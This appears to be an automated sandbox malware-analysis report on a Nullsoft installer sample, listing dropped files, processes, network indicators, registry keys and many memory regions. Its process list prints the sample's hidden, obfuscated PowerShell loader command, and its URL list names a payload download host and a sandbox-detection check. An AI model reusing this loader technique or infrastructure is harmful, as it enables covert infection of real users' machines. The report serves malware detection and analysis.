Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
KWOTASIE.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Innoxious\Phantasies.ude
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Innoxious\Leddelingernes.Gir
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Innoxious\arbejdssociologens.huf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Innoxious\codium.ant
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Innoxious\dumheds.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Innoxious\fibrisers.fot
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Innoxious\induktionskogezoner.mid
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Innoxious\kvindeemancipations.alt
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg2c4d2n.pyl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvqolrje.mkf.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\KWOTASIE.exe
|
"C:\Users\user\Desktop\KWOTASIE.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://r11.o.len
|
unknown
|
||
|
http://mail.lumies.co.za
|
unknown
|
||
|
http://r11.o.lencr.org0#
|
unknown
|
||
|
http://zakk.co.za/GHAchl0.bin
|
102.218.215.35
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
http://r11.i.lencr.org/0
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
||
|
http://ip-api.com
|
unknown
|
There are 1 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
|
|
mail.lumies.co.za
|
102.130.125.173
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
zakk.co.za
|
102.218.215.35
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
102.130.125.173
|
mail.lumies.co.za
|
South Africa
|
|
|
|
102.218.215.35
|
zakk.co.za
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\bjergningsfirmaet\varmekilder\Diffusate
|
Rimesses
|
||
|
HKEY_CURRENT_USER\unstayable\Uninstall\antrkket
|
ramilie
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21B21000
|
trusted library allocation
|
page read and write
|
|
|
|
21B71000
|
trusted library allocation
|
page read and write
|
|
|
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
760000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
31A000
|
trusted library allocation
|
page execute and read and write
|
||
|
23EC3000
|
heap
|
page read and write
|
||
|
24211000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
45E000
|
unkown
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
3F5000
|
heap
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
24C90000
|
trusted library allocation
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
23B94000
|
trusted library allocation
|
page read and write
|
||
|
29F6000
|
heap
|
page read and write
|
||
|
970000
|
direct allocation
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
425000
|
unkown
|
page read and write
|
||
|
2360000
|
heap
|
page read and write
|
||
|
248DE000
|
stack
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
4BEF000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
295A000
|
heap
|
page read and write
|
||
|
C7E000
|
stack
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
2971000
|
heap
|
page read and write
|
||
|
29EF000
|
heap
|
page read and write
|
||
|
24920000
|
trusted library allocation
|
page read and write
|
||
|
900000
|
direct allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
23F1A000
|
heap
|
page read and write
|
||
|
2412D000
|
stack
|
page read and write
|
||
|
8C0000
|
direct allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
920000
|
direct allocation
|
page read and write
|
||
|
2A24000
|
heap
|
page read and write
|
||
|
241AE000
|
stack
|
page read and write
|
||
|
24260000
|
remote allocation
|
page read and write
|
||
|
23C20000
|
heap
|
page execute and read and write
|
||
|
2A6D000
|
heap
|
page read and write
|
||
|
24270000
|
trusted library allocation
|
page execute and read and write
|
||
|
24260000
|
trusted library allocation
|
page read and write
|
||
|
325000
|
trusted library allocation
|
page execute and read and write
|
||
|
29DB000
|
heap
|
page read and write
|
||
|
218E000
|
stack
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24212000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
24250000
|
trusted library allocation
|
page read and write
|
||
|
A37000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
3FB0000
|
remote allocation
|
page execute and read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
427000
|
unkown
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
22B55000
|
trusted library allocation
|
page read and write
|
||
|
4BEF000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
23F58000
|
heap
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
23EB4000
|
heap
|
page read and write
|
||
|
24850000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24920000
|
trusted library allocation
|
page read and write
|
||
|
23BA2000
|
trusted library allocation
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
2425D000
|
stack
|
page read and write
|
||
|
2A62000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
24250000
|
trusted library allocation
|
page read and write
|
||
|
24920000
|
trusted library allocation
|
page read and write
|
||
|
24222000
|
trusted library allocation
|
page read and write
|
||
|
645000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
4C67000
|
heap
|
page read and write
|
||
|
2F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F4000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24930000
|
trusted library allocation
|
page read and write
|
||
|
2250000
|
heap
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
23B9E000
|
trusted library allocation
|
page read and write
|
||
|
2A16000
|
heap
|
page read and write
|
||
|
21ADE000
|
stack
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
241F0000
|
trusted library allocation
|
page read and write
|
||
|
7BA000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
4CA3000
|
heap
|
page read and write
|
||
|
930000
|
direct allocation
|
page read and write
|
||
|
460000
|
unkown
|
page readonly
|
||
|
408000
|
unkown
|
page readonly
|
||
|
793000
|
heap
|
page read and write
|
||
|
4C70000
|
heap
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
312000
|
trusted library allocation
|
page read and write
|
||
|
2420D000
|
trusted library allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
95F000
|
stack
|
page read and write
|
||
|
77E000
|
heap
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
460000
|
unkown
|
page readonly
|
||
|
24920000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
214A000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
241EE000
|
stack
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
316000
|
trusted library allocation
|
page execute and read and write
|
||
|
24240000
|
trusted library allocation
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
24240000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
7F9000
|
heap
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
21B82000
|
trusted library allocation
|
page read and write
|
||
|
23BB6000
|
trusted library allocation
|
page read and write
|
||
|
32B000
|
trusted library allocation
|
page execute and read and write
|
||
|
86C000
|
heap
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
327000
|
trusted library allocation
|
page execute and read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24246000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
241F0000
|
trusted library allocation
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
23CD0000
|
heap
|
page read and write
|
||
|
2173B000
|
stack
|
page read and write
|
||
|
310000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24C70000
|
trusted library allocation
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
219A0000
|
trusted library allocation
|
page read and write
|
||
|
777000
|
heap
|
page read and write
|
||
|
29DD000
|
heap
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
29AE000
|
heap
|
page read and write
|
||
|
4C95000
|
heap
|
page read and write
|
||
|
21A9C000
|
stack
|
page read and write
|
||
|
24930000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24213000
|
trusted library allocation
|
page read and write
|
||
|
23B9B000
|
trusted library allocation
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
2982000
|
heap
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
2424E000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
unkown
|
page readonly
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
29A2000
|
heap
|
page read and write
|
||
|
219C0000
|
trusted library allocation
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
8E0000
|
direct allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
23CB0000
|
trusted library allocation
|
page read and write
|
||
|
4C14000
|
heap
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24297000
|
trusted library allocation
|
page read and write
|
||
|
21980000
|
trusted library allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
24260000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24C80000
|
trusted library allocation
|
page read and write
|
||
|
23C0C000
|
stack
|
page read and write
|
||
|
216FD000
|
stack
|
page read and write
|
||
|
2A2C000
|
heap
|
page read and write
|
||
|
24260000
|
trusted library allocation
|
page read and write
|
||
|
767000
|
heap
|
page read and write
|
||
|
24260000
|
trusted library allocation
|
page read and write
|
||
|
2959000
|
heap
|
page read and write
|
||
|
23BAE000
|
trusted library allocation
|
page read and write
|
||
|
2A7C000
|
heap
|
page read and write
|
||
|
24920000
|
trusted library allocation
|
page read and write
|
||
|
42B000
|
unkown
|
page read and write
|
||
|
5461000
|
remote allocation
|
page execute and read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
29B7000
|
heap
|
page read and write
|
||
|
2420D000
|
trusted library allocation
|
page read and write
|
||
|
2404000
|
heap
|
page read and write
|
||
|
24221000
|
trusted library allocation
|
page read and write
|
||
|
24260000
|
trusted library allocation
|
page read and write
|
||
|
22AF1000
|
trusted library allocation
|
page read and write
|
||
|
7BD000
|
heap
|
page read and write
|
||
|
29F2000
|
heap
|
page read and write
|
||
|
23AF8000
|
trusted library allocation
|
page read and write
|
||
|
940000
|
direct allocation
|
page read and write
|
||
|
300000
|
trusted library allocation
|
page read and write
|
||
|
2995000
|
heap
|
page read and write
|
||
|
21A5E000
|
stack
|
page read and write
|
||
|
24290000
|
trusted library allocation
|
page read and write
|
||
|
4061000
|
remote allocation
|
page execute and read and write
|
||
|
23BD0000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
23C10000
|
trusted library allocation
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
24250000
|
trusted library allocation
|
page read and write
|
||
|
24920000
|
trusted library allocation
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
23F13000
|
heap
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
23EB1000
|
heap
|
page read and write
|
||
|
62E000
|
stack
|
page read and write
|
||
|
7CE000
|
heap
|
page read and write
|
||
|
218E0000
|
direct allocation
|
page read and write
|
||
|
CBF000
|
stack
|
page read and write
|
||
|
24217000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
unkown
|
page readonly
|
||
|
79F000
|
heap
|
page read and write
|
||
|
2400000
|
heap
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
23CF1000
|
heap
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
3F7000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
218F0000
|
direct allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
295C000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
4C74000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
4BE0000
|
trusted library allocation
|
page read and write
|
||
|
2A83000
|
heap
|
page read and write
|
||
|
21B6D000
|
trusted library allocation
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
4C9F000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
24290000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
24C70000
|
trusted library allocation
|
page read and write
|
||
|
2951000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
2145000
|
heap
|
page read and write
|
||
|
4CB4000
|
heap
|
page read and write
|
||
|
21990000
|
heap
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24260000
|
remote allocation
|
page read and write
|
||
|
23F42000
|
heap
|
page read and write
|
||
|
21750000
|
trusted library allocation
|
page read and write
|
||
|
2140000
|
heap
|
page read and write
|
||
|
2952000
|
heap
|
page read and write
|
||
|
29DB000
|
heap
|
page read and write
|
||
|
A30000
|
heap
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
950000
|
direct allocation
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
24240000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
23CF0000
|
heap
|
page read and write
|
||
|
21B5F000
|
trusted library allocation
|
page read and write
|
||
|
23BC2000
|
trusted library allocation
|
page read and write
|
||
|
2850000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
2A63000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
79F000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
23C10000
|
trusted library allocation
|
page read and write
|
||
|
23F47000
|
heap
|
page read and write
|
||
|
24260000
|
remote allocation
|
page read and write
|
||
|
23BBD000
|
trusted library allocation
|
page read and write
|
||
|
30D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C5E000
|
stack
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
23B90000
|
trusted library allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
23C6C000
|
stack
|
page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
7F7000
|
heap
|
page read and write
|
||
|
24260000
|
trusted library allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
29E8000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24260000
|
trusted library allocation
|
page read and write
|
||
|
4C9A000
|
heap
|
page read and write
|
||
|
4A61000
|
remote allocation
|
page execute and read and write
|
||
|
7D9000
|
heap
|
page read and write
|
||
|
2370000
|
heap
|
page read and write
|
||
|
21A1E000
|
stack
|
page read and write
|
||
|
296C000
|
heap
|
page read and write
|
||
|
7F730000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D5000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
24280000
|
trusted library allocation
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
8F0000
|
direct allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
2986000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24240000
|
trusted library allocation
|
page read and write
|
||
|
24270000
|
trusted library allocation
|
page read and write
|
||
|
217F0000
|
heap
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
2A11000
|
heap
|
page read and write
|
||
|
23F21000
|
heap
|
page read and write
|
||
|
219D0000
|
heap
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
910000
|
direct allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
284F000
|
stack
|
page read and write
|
||
|
23F53000
|
heap
|
page read and write
|
||
|
44C000
|
unkown
|
page read and write
|
||
|
2193A000
|
stack
|
page read and write
|
||
|
8B0000
|
heap
|
page readonly
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
960000
|
direct allocation
|
page read and write
|
||
|
21979000
|
stack
|
page read and write
|
||
|
2F0000
|
trusted library allocation
|
page read and write
|
||
|
8D0000
|
direct allocation
|
page read and write
|
||
|
23EB1000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
21AE0000
|
heap
|
page execute and read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24C90000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
4BEF000
|
heap
|
page read and write
|
||
|
21B79000
|
trusted library allocation
|
page read and write
|
||
|
322000
|
trusted library allocation
|
page read and write
|
||
|
24CA0000
|
trusted library allocation
|
page read and write
|
||
|
23B96000
|
trusted library allocation
|
page read and write
|
||
|
23BB1000
|
trusted library allocation
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
2416E000
|
stack
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
7EE000
|
heap
|
page read and write
|
||
|
74F000
|
stack
|
page read and write
|
||
|
29A4000
|
heap
|
page read and write
|
||
|
24270000
|
trusted library allocation
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
2966000
|
heap
|
page read and write
|
||
|
77B000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
22B19000
|
trusted library allocation
|
page read and write
|
||
|
24930000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
2188E000
|
stack
|
page read and write
|
||
|
2FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
217DF000
|
stack
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
24C70000
|
trusted library allocation
|
page read and write
|
||
|
2A23000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
7BD000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
2179E000
|
stack
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
21CE000
|
stack
|
page read and write
|
||
|
2A32000
|
heap
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
2184D000
|
stack
|
page read and write
|
||
|
2975000
|
heap
|
page read and write
|
||
|
5E61000
|
remote allocation
|
page execute and read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
219B0000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24240000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
23CE0000
|
heap
|
page read and write
|
||
|
24C60000
|
trusted library allocation
|
page read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
295E000
|
heap
|
page read and write
|
||
|
241F0000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
330000
|
trusted library allocation
|
page execute and read and write
|
||
|
24211000
|
trusted library allocation
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
24B5E000
|
stack
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
7A3000
|
heap
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
422000
|
unkown
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
435000
|
unkown
|
page read and write
|
||
|
24920000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
7B3000
|
heap
|
page read and write
|
||
|
2110000
|
heap
|
page read and write
|
||
|
24280000
|
trusted library allocation
|
page execute and read and write
|
||
|
24230000
|
trusted library allocation
|
page read and write
|
||
|
235F000
|
stack
|
page read and write
|
||
|
23C10000
|
trusted library allocation
|
page read and write
|
||
|
23EB0000
|
heap
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
21AF1000
|
trusted library allocation
|
page read and write
|
||
|
24220000
|
trusted library allocation
|
page read and write
|
||
|
24210000
|
trusted library allocation
|
page read and write
|
||
|
2A73000
|
heap
|
page read and write
|
||
|
24CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CBA000
|
heap
|
page read and write
|
||
|
241F8000
|
trusted library allocation
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
page read and write
|
||
|
24203000
|
trusted library allocation
|
page read and write
|
||
|
24250000
|
trusted library allocation
|
page read and write
|
||
|
24200000
|
trusted library allocation
|
